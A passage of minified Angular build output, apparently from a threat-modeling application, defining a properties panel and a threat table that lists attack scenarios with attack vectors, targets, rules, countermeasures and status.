b5}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(RT),Ee(_r),Ee(Oo),Ee(El))},t.\u0275cmp=Wt({type:t,selectors:[["app-properties"]],hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{dataObject:"dataObject",selectedObject:"selectedObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",openQuestionnaire:"openQuestionnaire"},decls:4,vars:1,consts:[[2,"width","100%","height","100%","font-size","small"],["id","proptable","style","padding: 10px; width: 100%;",4,"ngIf"],["id","proptable",2,"padding","10px","width","100%"],["span","1",2,"width","calc(100% - 200px)"],["span","1",2,"width","200px"],[4,"ngFor","ngForOf"],[4,"ngIf"],["matTooltipShowDelay","1000",3,"matTooltip"],["style","width: 100%;",3,"disable","ngModel","change",4,"ngIf"],["mat-raised-button","",3,"click",4,"ngIf"],["color","primary",3,"checked","disabled","change",4,"ngIf"],["class","buttonAsText primary-color",3,"click",4,"ngIf"],["style","width: 100%;",3,"ngModel","change",4,"ngIf"],["color","primary",3,"checked","change",4,"ngIf"],["type","text","style","width: 100%;",3,"spellcheck","value","disabled","input",4,"ngIf"],["class","matSelect","style","width: 100%;","multiple","",3,"value","selectionChange",4,"ngIf"],["mat-raised-button","","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","click",4,"ngIf"],["type","text","style","width: 100%; font-size: inherit;",3,"spellcheck","value","disabled","input",4,"ngIf"],["type","text","style","width: 100%;",3,"spellcheck","invalid","value","disabled","input",4,"ngIf"],[2,"width","100%",3,"ngModel","change"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-raised-button","",3,"click"],["color","primary",3,"checked","disabled","change"],["mat-icon-button","","cdkOverlayOrigin","","matTooltipShowDelay","1000",1,"iconBtn",2,"margin-right","5px",3,"matTooltip","click"],["trigger","cdkOverlayOrigin"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["cx","3","cy","3","r","2",4,"ngIf"],["cx","3","cy","20","r","2",4,"ngIf"],["cx","20","cy","3","r","2",4,"ngIf"],["cx","20","cy","20","r","2",4,"ngIf"],["cx","11.5","cy","3","r","2"],["cx","11.5","cy","20","r","2"],["cx","3","cy","11.5","r","2"],["cx","20","cy","11.5","r","2"],["cdkConnectedOverlay","",3,"cdkConnectedOverlayOrigin","cdkConnectedOverlayOpen"],["cx","3","cy","3","r","2"],["cx","3","cy","20","r","2"],["cx","20","cy","3","r","2"],["cx","20","cy","20","r","2"],[1,"flowAnchorOverlay",2,"padding","3px"],[1,"flowAnchorOverlay"],["mat-icon-button","","class","anchorBtn",3,"click",4,"ngIf"],[2,"min-width","40px","width","100%","text-align","center"],["mat-icon-button","",1,"anchorBtn",3,"click"],["xmlns","http://www.w3.org/2000/svg","width","18","height","18","version","1.1"],["fill","#d9d9d9","cx","8","cy","8","r","8"],["x1","2.5","y1","2.5","x2","13.5","y2","13.5",2,"stroke-width","2"],["x1","2.5","y1","13.5","x2","13.5","y2","2.5",2,"stroke-width","2"],[2,"min-width","40px","width","100%","text-align","center","font-size","small"],[1,"flowAnchorOverlay",2,"margin-top","3px"],["mat-icon-button","","matTooltipShowDelay","1000",1,"anchorBtn",2,"position","absolute","top","-8px","right","-8px","width","20px","height","20px",3,"matTooltip","click"],["xmlns","http://www.w3.org/2000/svg","width","20","height","20","version","1.1"],["cx","9","cy","9","r","8",2,"stroke-width","2"],["x1","3.5","y1","3.5","x2","14.5","y2","14.5",2,"stroke-width","2"],["x1","3.5","y1","14.5","x2","14.5","y2","3.5",2,"stroke-width","2"],[1,"buttonAsText","primary-color",3,"click"],[3,"label",4,"ngFor","ngForOf"],[3,"label"],["no-space","","multiple","",1,"matSelect",2,"width","calc(100% - 22px)",3,"disabled","value","selectionChange"],["matInput","",1,"searchBox",3,"placeholder","keyup"],["class","matOption","color","primary",3,"value",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"height","20px","width","20px","line-height","20px",3,"matTooltip","click"],["color","primary",1,"matOption",3,"value"],["color","primary",3,"checked","change"],["type","text",2,"width","100%",3,"spellcheck","value","disabled","input"],["multiple","",1,"matSelect",2,"width","100%",3,"value","selectionChange"],["mat-raised-button","","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","click"],["type","text",2,"width","100%","font-size","inherit",3,"spellcheck","value","disabled","input"],["style","margin-right: 5px;",4,"ngFor","ngForOf"],[2,"margin-right","5px"],["matTooltipShowDelay","1000",1,"buttonAsText",2,"font-size","small",3,"matTooltip","click"],["colspan","2"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),ne(2,Zdt,15,3,"table",1),s(3,"\n"),u()),2&e&&(C(2),V("ngIf",i.selectedObject))},dependencies:[Zi,Ri,pm,_m,Td,Ta,Ea,oa,Hh,br,da,Nr,yr,Xa,Pa,i8,t8,KT,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%], .matOption[_ngcontent-%COMP%]     .mat-pseudo-checkbox-checked{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .flowAnchorOverlay-light[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .flowAnchorOverlay-dark[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}button[_ngcontent-%COMP%]{font-size:11px;line-height:20px}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0;padding:0;cursor:pointer;font-size:small}.matSelect[_ngcontent-%COMP%]{background-color:#fff!important;border-radius:2px;height:17px;border:gray 1px solid}.matSelect[_ngcontent-%COMP%]     .mat-select-arrow{color:#000!important}.matSelect[_ngcontent-%COMP%]     .mat-select-value{color:#000!important;font-size:smaller!important}.searchBox[_ngcontent-%COMP%]{background-color:#fff!important;height:17px;color:#000;border:0;outline:0;padding:0 8px;width:calc(100% - 16px)}.searchBox[_ngcontent-%COMP%]::placeholder{color:gray}.matOption[_ngcontent-%COMP%]{background-color:#fff!important;color:#000!important;height:20px!important;padding:0 8px!important}.matOption[_ngcontent-%COMP%]     .mat-option.mat-active{color:#000!important;background-color:#fff!important}.matOption[_ngcontent-%COMP%]     .mat-pseudo-checkbox{color:gray!important}.invalid[_ngcontent-%COMP%]{border:1px solid red}.disable[_ngcontent-%COMP%]{pointer-events:none}  .mat-tooltip{white-space:pre-line!important}.flowAnchorOverlay[_ngcontent-%COMP%]{border:solid 1px #ccc;border-radius:5px;margin:0}.flowAnchorOverlay-dark[_ngcontent-%COMP%], .flowAnchorOverlay-light[_ngcontent-%COMP%]{border-color:#fff}.iconBtn[_ngcontent-%COMP%]{height:24px;width:25px;min-width:25px;padding:0;line-height:20px}.anchorBtn[_ngcontent-%COMP%]{height:18px;width:18px;min-width:18px;padding:0;line-height:18px}"]}),t})();const emt=["searchCMBox"];function tmt(t,a){1&t&&it(0,"mat-progress-spinner",32),2&t&&V("diameter",20)}function imt(t,a){if(1&t&&(m(0,"span",33),s(1),u()),2&t){const e=B();C(1),ke(e.GetApplicableCount())}}function amt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function nmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function omt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function rmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function smt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function cmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function lmt(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function dmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon",37),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,4,i.GetCreationTypeIconTooltip(e))),V("matBadge","!")("matBadgeHidden",e.RuleStillApplies),C(2),ke(i.GetCreationTypeIcon(e))}}function mmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVector")," "))}function umt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.AttackVector?null:e.AttackVector.GetProperty("Name")," ")}}function hmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.ThreatCategories")," "))}function fmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetThreatCategories(e)," ")}}function pmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Target")," "))}function _mt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",B().IsElementSelected(e)),C(1),ct(" ",null==e.Target?null:e.Target.GetProperty("Name")," ")}}function gmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Rule")," "))}function Cmt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ThreatRule.GetProperty("Name"))}}function ymt(t,a){if(1&t&&(m(0,"td",35),s(1," "),ne(2,Cmt,2,1,"ng-container",38),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.ThreatRule)}}function bmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function Mmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function vmt(t,a){1&t&&(m(0,"th",39),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Countermeasures")," "))}function Amt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetCountermeasures(e)," ")}}function Tmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function Emt(t,a){if(1&t&&(m(0,"option",42),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function Dmt(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1,"\n          "),m(2,"select",40),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n            "),ne(4,Emt,3,4,"option",41),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function xmt(t,a){1&t&&(m(0,"th",39),s(1," "),u())}function wmt(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1," "),m(2,"mat-icon",43),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function Imt(t,a){1&t&&it(0,"tr",44)}function Rmt(t,a){if(1&t){const e=Ye();m(0,"tr",45),he("click",function(){const r=be(e).$implicit;return Me(B().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsThreatSelected(e))("removed-item",i.IsThreatRemoved(e)||i.IsThreatNotApplying(e)),V("id",e.ID)}}function Smt(t,a){if(1&t){const e=Ye();m(0,"tr",46),s(1,"\n        "),m(2,"td",47),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function kmt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function Pmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function Omt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function Nmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Lmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function zmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function Wmt(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function Fmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon",37),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,4,i.GetCreationTypeIconTooltip(e))),V("matBadge","!")("matBadgeHidden",e.RuleStillApplies),C(2),ke(i.GetCreationTypeIcon(e))}}function Vmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVector")," "))}function Bmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.AttackVector?null:e.AttackVector.GetProperty("Name")," ")}}function Hmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.ThreatCategories")," "))}function Umt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetThreatCategories(e)," ")}}function qmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Target")," "))}function Gmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",B().IsElementSelected(e)),C(1),ct(" ",null==e.Target?null:e.Target.GetProperty("Name")," ")}}function jmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Rule")," "))}function Qmt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ThreatRule.GetProperty("Name"))}}function $mt(t,a){if(1&t&&(m(0,"td",35),s(1," "),ne(2,Qmt,2,1,"ng-container",38),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.ThreatRule)}}function Kmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function Xmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function Ymt(t,a){1&t&&(m(0,"th",39),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Countermeasures")," "))}function Jmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetCountermeasures(e)," ")}}function Zmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function eut(t,a){if(1&t&&(m(0,"option",42),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function tut(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1,"\n          "),m(2,"select",40),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n            "),ne(4,eut,3,4,"option",41),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function iut(t,a){1&t&&(m(0,"th",39),s(1," "),u())}function aut(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1," "),m(2,"mat-icon",43),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function nut(t,a){if(1&t){const e=Ye();m(0,"tr",48),he("click",function(){const r=be(e).$implicit;return Me(B().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsThreatSelected(e))("removed-item",i.IsThreatRemoved(e)||i.IsThreatNotApplying(e))}}function out(t,a){if(1&t&&(m(0,"span",62),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function rut(t,a){1&t&&(m(0,"span",62),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}const sut=function(t){return{item:t}};function cut(t,a){if(1&t&&(m(0,"button",63),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(48))("matMenuTriggerData",fr(3,sut,e.countermeasures)),C(1),ke(e.name)}}function lut(t,a){if(1&t){const e=Ye();m(0,"button",64),he("click",function(){const r=be(e).$implicit,c=B(2).item;return Me(B().AddExistingCountermeasure(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function dut(t,a){if(1&t&&(s(0,"\n          "),ne(1,lut,2,2,"button",61),s(2,"\n        ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function mut(t,a){if(1&t){const e=Ye();m(0,"button",64),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B().AddExistingCountermeasure(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function uut(t,a){if(1&t){const e=Ye();s(0,"\n      "),ne(1,out,2,1,"span",49),s(2," \n      "),ne(3,rut,3,3,"span",49),s(4,"\n      "),m(5,"button",50),he("click",function(){const r=be(e).item;return Me(B().OnMappingDblClick(r,null))}),s(6,"\n        "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n        "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n      "),u(),s(14," \n      "),m(15,"button",51),s(16,"\n        "),m(17,"mat-icon"),s(18,"security"),u(),s(19,"\n        "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n      "),u(),s(24,"\n      "),m(25,"mat-menu",null,52),s(27,"\n        "),m(28,"button",53),he("click",function(){const r=be(e).item;return Me(B().AddCountermeasure(r))}),s(29),oe(30,"translate"),u(),s(31,"\n        "),m(32,"button",54),s(33),oe(34,"translate"),u(),s(35,"\n      "),u(),s(36,"\n      "),m(37,"mat-menu",null,55),s(39,"\n        "),m(40,"input",56,57),he("ngModelChange",function(n){return be(e),Me(B().searchCMString=n)})("click",function(){return be(e),Me(B().OnSearchCMBoxClick())}),oe(42,"translate"),u(),s(43,"\n        "),ne(44,cut,2,5,"button",58),s(45,"\n      "),u(),s(46,"\n      "),m(47,"mat-menu",null,59),s(49,"\n        "),ne(50,dut,3,1,"ng-template",31),s(51," \n      "),u(),s(52,"\n      "),m(53,"mat-menu",null,60),s(55,"\n        "),ne(56,mut,2,2,"button",61),s(57,"\n      "),u(),s(58,"\n\n      "),m(59,"button",50),he("click",function(){const r=be(e).item;return Me(B().OnViewCountermeasures(r))}),s(60,"\n        "),m(61,"mat-icon"),s(62,"preview"),u(),s(63,"\n        "),m(64,"span"),s(65),oe(66,"translate"),u(),s(67,"\n      "),u(),s(68," \n      "),m(69,"button",50),he("click",function(){const r=be(e).item;return Me(B().OnDeleteMapping(r))}),s(70,"\n        "),m(71,"mat-icon"),s(72,"delete"),u(),s(73,"\n        "),m(74,"span"),s(75),oe(76,"translate"),u(),s(77,"\n      "),u(),s(78,"\n      "),m(79,"button",53),he("click",function(){return be(e),Me(B().ResetNumbers())}),s(80,"\n        "),m(81,"mat-icon"),s(82,"delete"),u(),s(83,"\n        "),m(84,"span"),s(85),oe(86,"translate"),u(),s(87,"\n      "),u(),s(88,"\n    ")}if(2&t){const e=a.item,i=Ti(26),n=Ti(38),r=Ti(54),c=B();C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,20,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e)("matMenuTriggerFor",i),C(6),ke(re(22,22,"pages.modeling.diagram.addCountermeasure")),C(8),ke(re(30,24,"general.New")),C(3),V("matMenuTriggerFor",n),C(1),ke(re(34,26,"general.Existing")),C(7),at("placeholder",re(42,28,"general.Search")),V("ngModel",c.searchCMString)("matMenuTriggerFor",r),C(4),V("ngForOf",c.GetCountermeasureGroups(e)),C(12),V("ngForOf",c.GetFilteredCountermeasures(e)),C(3),V("disabled",!e),C(6),ke(re(66,30,"pages.modeling.threattable.viewCountermeasures")),C(4),V("disabled",!e),C(6),ke(re(76,32,"pages.modeling.threattable.deleteEntry")),C(10),ke(re(86,34,"pages.modeling.threattable.resetNumbers"))}}let hut=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.threatEngine=n,this.dialog=r,this.translate=c,this.changesCounter=0,this.isCalculatingThreats=!1,this._attackScenarios=[],this.countermeasureCounts={},this.displayedColumns=[],this.autoRefreshThreats=!0,this.menuTopLeftPosition={x:"0",y:"0"},this.selectedObjectChanged=new Tt,this.threatCountChanged=new Tt,this.searchCMString="";let d=()=>{this.autoRefreshThreats&&(0==this.changesCounter?setTimeout(()=>{this.isCalculatingThreats=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshThreats()},3e3))};this.dataService.Project&&setTimeout(()=>{var T,k,q,Y;null===(T=this.dataService.Project)||void 0===T||T.DFDElementsChanged.subscribe(te=>d()),null===(k=this.dataService.Project)||void 0===k||k.MyComponentsChanged.subscribe(te=>d()),null===(q=this.dataService.Project)||void 0===q||q.AttackScenariosChanged.subscribe(te=>{te.Type==Ja.Added&&(this.dataService.Project.GetAttackScenario(te.ID).IsGenerated||d()),this.countermeasureCounts={}}),null===(Y=this.dataService.Project)||void 0===Y||Y.CountermeasuresChanged.subscribe(te=>this.countermeasureCounts={})},1e3)}get refreshingThreats(){return this.changesCounter>0||this.isCalculatingThreats}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._filteredObject&&(e=e.filter(d=>d.Targets.includes(this._filteredObject)||d.Target==this._filteredObject)),this._attackScenarios=e;const i=(d,T)=>"name"==T?d.Name:"number"==T?Number(d.Number):"state"==T?d.MappingState:"type"==T?d.IsGenerated?1:0:"vector"==T?d.AttackVector.Name:"status"==T?d.ThreatState:"categories"==T?this.GetThreatCategories(d):"target"==T?d.Target.Name:"rule"==T?d.ThreatRule.Name:"elements"==T?this.GetTargets(d):void console.error("Missing sorting header"),n=(d,T)=>{let k=T.trim().toLowerCase(),q=d.Name.toLowerCase().indexOf(k);return-1==q&&d.AttackVector&&(q=d.AttackVector.Name.toLowerCase().indexOf(k)),-1==q&&this.GetThreatCategories(d)&&(q=this.GetThreatCategories(d).toLowerCase().indexOf(k)),-1==q&&this.GetTargets(d)&&(q=this.GetTargets(d).toLowerCase().indexOf(k)),-1==q&&d.ThreatRule&&(q=d.ThreatRule.Name.toLowerCase().indexOf(k)),-1!=q},r=e.filter(d=>![_o.NotApplicable,_o.Duplicate].includes(d.ThreatState));r.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceActive=new Ld(r),this.dataSourceActive.sort=this.sort,this.dataSourceActive.sortingDataAccessor=i,this.dataSourceActive.filterPredicate=n;const c=e.filter(d=>[_o.NotApplicable,_o.Duplicate].includes(d.ThreatState));c.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceNA=new Ld(c),this.dataSourceNA.sort=this.sort,this.dataSourceNA.sortingDataAccessor=i,this.dataSourceNA.filterPredicate=n,this.sort&&this.sort.sortChange.emit(this.sort)}get selectedThreat(){return this._selectedThreat}set selectedThreat(e){this._selectedThreat=e}get selectedNode(){return this._selectedNode}set selectedNode(e){var i;this._selectedNode=e,this.displayedColumns=["state","number","type","name","vector","target"],(null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof Bg&&this.displayedColumns.push("elements"),this.displayedColumns.push("countermeasures","status","more"),this.RefreshThreats()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshThreats()}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedThreat){const n=(r,c)=>{this.SelectThreat(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedThreat);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedThreat);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshThreats(){setTimeout(()=>{var e,i,n;this.AttackScenarios=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&((null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof as?this.AttackScenarios=this.threatEngine.GenerateDiagramThreats(this._selectedNode.data):(null===(n=this._selectedNode)||void 0===n?void 0:n.data)instanceof 